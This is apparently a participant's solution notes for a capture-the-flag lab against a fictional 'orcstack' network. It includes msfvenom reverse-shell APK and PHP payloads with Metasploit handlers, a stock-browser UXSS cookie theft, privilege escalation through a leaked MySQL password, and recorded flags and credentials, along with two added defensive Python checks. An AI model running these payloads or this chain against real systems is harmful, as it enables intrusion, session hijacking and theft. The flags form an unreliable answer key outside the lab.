10.2.2.2

port 52080

10.2.2.2

ssh -i ~/Downloads/netwars.priv -R 52080:localhost:52080 lurkers@netwars-ng.counterhack.com

alias jumpbox='ssh -i ~/netwars.priv aoluser927@netwars-ng.counterhack.com -p 62201'
alias proxy='ssh -i ~/netwars.priv aoluser927@netwars-ng.counterhack.com -p 62201 -D 8080 -N'

level 3
---------------------------
Question 1
---------------------------
Register for an account from www.orcstack.com. What is the User Agent (entire line, beginning with "User-Agent: ") of the Android device that connects using the "Deploy URL" page?

Target: android-web.orcstack.com

In order to see the HTTP traffic of the Android device, you need either a Man-in-the-Middle, have access to the HTTP client, or be the destination. Of these three options, as of now you only have access to the last option. Be sure to form the URL using the IP address of the SSH jump box you're currently connected to.
The HTTP protocol specifies the HTTP client sends the request (including its User Agent) upon making a TCP connection. You need to set up a TCP listener on a high unused port* of the SSH jump box and create a URL to the IP and port of your TCP listener.
* You need to use a high port because you're not root (which is required to listen on ports below 1024), and because your SSH jump box is shared with other people you may need to choose a different port if the one you chose was already in use.
---------------------------
Solution:

Fire off a listener on your jump box.
nc -lvp 12345

Submit a link to the website:
http://10.2.2.2

User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VMware Virtual Platform Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30

---------------------------
Question 2
---------------------------
What is the flag located at /data/data/flag.txt?

Target: android-apk.orcstack.com

In the android-web questions, you entered a URL that an Android device would browse to using a mobile web browser. In this question, you'll enter a URL to an APK file that a different Android device will install and run. Using that Android program, you'll need to gain some kind of shell access, elevate your privileges, and read /data/data/flag.txt on the Android device itself. You may have used Metasploit and msfvenom to create EXE files that "phone home" with Meterpreter when run on Windows targets, or PHP files that do the same when interpreted on PHP servers. Similarly, msfvenom can create APK files that have an Android Meterpreter on them.
---------------------------
Solution:

msfvenom -p android/meterpreter/reverse_tcp LHOST=10.2.2.2 LPORT=52080 R > boom.apk

http://10.2.2.2/~lurkers/boom.apk

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 52080
exploit -j

adb root
cat /data/data/flag.txt
e2415cb7f63df0c9de23362326ad3c37a9adfc96

---------------------------
Question 3
---------------------------
A common password management application is installed on this Android device. Recover a flag stored in plain text inside a database used by this application.

Target: android-apk.orcstack.com

You'll need to have already answered the previous question to have the necessary access to the Android device to answer this question. First, find the correct application folder under /data/data. Then, transfer the entire folder and its contents using tar and netcat back to your home folder on the SSH jump box. Finally, examine the database inside that folder carefully.

---------------------------
Solution:

cd /data/data/com.easylogics.safe.keeper.password.secure/databases/
sqlite3 SafeKeeper
.dump
cedf6dc6b8893245ac066589860274fe80e6370f

---------------------------
Question 4
---------------------------
Using the credentials gathered in answering another question, log in to www.orcstack.com and access the Dashboard to find an unpublished page containing a flag.

Target: www.orcstack.com
---------------------------
Solution:

http://www.orcstack.com/Admin
administrator
Uruk-Hai
80b4a4e3cbc8827b579b9873c5efd8d6bd7c977e

---------------------------
Question 5
---------------------------
Using the credentials gathered in answering another question, log in to www.orcstack.com and find a SHA1 hash used as a key to send commands to the development server over HTTP.

Target: www.orcstack.com

This question requires thorough pillaging of information under the Dashboard of the web server on www.orcstack.com.
How do the "Deploy URL" and "Deploy APK" pages work?
---------------------------
Solution:
Look in the workflows tabs after logging in:
type=apk
url={Content.Fields.AndroidAPK.URL}
name={Content.Fields.AndroidAPK.ApplicationName}
key=5c9b478a5576dbf8537adfc9ebf075c613ce022e

---------------------------
Question 6
---------------------------
Exploit a vulnerability in the Android version used for the "Deploy URL" capability of www.orcstack.com to gain access to the web cookies for http://blog.orcstack.com/. Use those cookies to gain access to a flag located in a non-Published page.

Target: blog.orcstack.com

Unless there's a Universal Cross-Site Scripting flaw, normally a web browser accessing (for example) http://google.com/ would never reveal cookies for a separate domain such as http://bing.com/. What Android version is being used by this device?
msf > info auxiliary/gather/android_stock_browser_uxss
The above module is effective against this Android device. Use the msfconsole utility to select this module and then use the "Deploy URL" capability of www.orcstack.com to gather the cookies for http://blog.orcstack.com/. Once you've done this, add the same cookies to your local browser, configure your local browser to use an SSH proxy so it can connect to the Orc Stack DMZ, then browse to http://blog.orcstack.com.
---------------------------
Solution:
use auxiliary/gather/android_stock_browser_uxss
set SRVPORT 50790
set TARGET_URLS http://blog.orcstack.com
set ssl true

edit cookie:
name: SESSd2caba14ddc97ae8122a3d641304185c
content: b2MREdZCPAoa9bvseV3QWCfqlgyDTOOW-iUXwR6rvIA

669edf6917c00d6c298676be757fef05634c614b
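
Questions 1 and 6 both hinge on what a client reveals in its first request: the listener in Question 1 receives the raw headers, and the Android version inside the User-Agent is what Question 6 asks about. The following is an added example, not part of the original notes, that parses a captured request and flags the legacy stock browser from the defender's side (for instance over proxy logs). The request bytes are constructed around the User-Agent recorded above; the 4.4 cut-off and the "Version/4.0 without Chrome/" heuristic are assumptions not stated on the page.

```python
import re

# Raw request as a plain TCP listener would receive it (constructed sample;
# the User-Agent value is the one recorded under Question 1 of these notes).
CAPTURED = (
    b"GET / HTTP/1.1\r\n"
    b"Host: 10.2.2.2:12345\r\n"
    b"User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VMware Virtual "
    b"Platform Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) "
    b"Version/4.0 Mobile Safari/534.30\r\n"
    b"Accept: */*\r\n\r\n"
)

# Assumption: the stock-browser UXSS affects Android releases before 4.4,
# as the Metasploit module description says (the page does not state this).
FIXED_IN = (4, 4)


def parse_headers(raw: bytes) -> dict:
    """Return request headers (lower-cased names) from raw HTTP bytes."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("iso-8859-1")
    headers = {}
    for line in head.split("\r\n")[1:]:  # skip the request line
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers


def android_version(user_agent: str):
    """Extract (major, minor) from an 'Android x[.y]' token, else None."""
    m = re.search(r"Android (\d+)(?:\.(\d+))?", user_agent)
    return (int(m.group(1)), int(m.group(2) or 0)) if m else None


def is_legacy_stock_browser(user_agent: str) -> bool:
    """True for the stock browser on an Android release older than FIXED_IN."""
    version = android_version(user_agent)
    # Heuristic (assumption): stock browser sends Version/4.0 and no Chrome/ token.
    stock = "Version/4.0" in user_agent and "Chrome/" not in user_agent
    return version is not None and version < FIXED_IN and stock


def triage(raw: bytes) -> dict:
    """Summarise what one captured request says about the client."""
    ua = parse_headers(raw).get("user-agent", "")
    return {"user_agent": ua, "android": android_version(ua),
            "legacy_stock_browser": is_legacy_stock_browser(ua)}
```
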
---------------------------
Question 7
---------------------------
Use an authenticated administrative web session on http://blog.orcstack.com/ to gain shell access as a limited user, then submit the contents of /flag.txt.

Target: blog.orcstack.com
---------------------------
Solution:
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.2.2.2 LPORT=21455 -f raw > shell.php

use multi/handler
set payload php/meterpreter_reverse_tcp
set lhost 0.0.0.0
set lport 21455
run -j

cat /flag.txt
4c9ef22b86ca78e8d265e007128b449f4a9ef68c
---------------------------
Question 8
---------------------------
Gain root privileges on blog.orcstack.com and submit the contents of /root/flag.txt.

Target: blog.orcstack.com
---------------------------
Solution:

cat /usr/local/bin/mysql-connect.sh
mysql --column-names --compress --host=localhost --wait -u root --password="DwarfTosser"
mysql --host=localhost -u root --password="DwarfTosser"

/usr/bin/python -c 'import pty; pty.spawn("/bin/bash")'

su
DwarfTosser

cat /root/flag.txt

a74687bbf8d6d21d555680bb98b6e1f9bf498d58
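
The weakness behind Question 8 is a helper script, readable by the limited user, that passes the database root password on the command line, and that password also works for su. The following is an added example, not part of the original notes, of a hardening check that flags such lines in scripts. The client list, the option-file line in the sample and the other-readable test are assumptions made for illustration.

```python
import re
import shlex
import stat

# Constructed sample: the first client invocation shown in these notes,
# plus one line that reads credentials from an option file instead.
SAMPLE_SCRIPT = '''#!/bin/sh
mysql --column-names --compress --host=localhost --wait -u root --password="DwarfTosser"
mysql --defaults-extra-file=/root/.my.cnf --host=localhost
'''

CLIENTS = {"mysql", "mysqldump", "mysqladmin"}  # assumed set of clients to audit


def inline_password_findings(script_text: str):
    """Return [(line_no, user)] for client calls carrying a literal password."""
    findings = []
    for no, line in enumerate(script_text.splitlines(), 1):
        try:
            argv = shlex.split(line, comments=True)
        except ValueError:  # unbalanced quotes: skip rather than guess
            continue
        if not argv or argv[0].rsplit("/", 1)[-1] not in CLIENTS:
            continue
        user, has_pw = None, False
        for i, arg in enumerate(argv[1:], 1):
            if arg.startswith("--password=") and len(arg) > len("--password="):
                has_pw = True
            elif re.fullmatch(r"-p.+", arg):  # short form: -pSECRET
                has_pw = True
            elif arg == "-u" and i + 1 < len(argv):
                user = argv[i + 1]
            elif arg.startswith("--user="):
                user = arg.split("=", 1)[1]
        if has_pw:
            findings.append((no, user))
    return findings


def world_readable(mode: int) -> bool:
    """True when a file mode (e.g. os.stat(path).st_mode) grants read to 'other'."""
    return bool(mode & stat.S_IROTH)
```

A finding for user root on a file where world_readable() is true is the combination these notes rely on; moving the credential into an option file with mode 0600 and using a distinct OS root password removes both steps.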
---------------------------
Question 9-10?
---------------------------
Using information found in answering another question, find the credentials to a service on www.orcstack.com, then submit the flag found inside.

Target: www.orcstack.com
---------------------------
Solution:

67836526fe7fcce735af56939378d7b1fd7e2f38

System Login:
psexec to www with
Username: Administrator
Password: Magical_Unicorns

67836526fe7fcce735af56939378d7b1fd7e2f38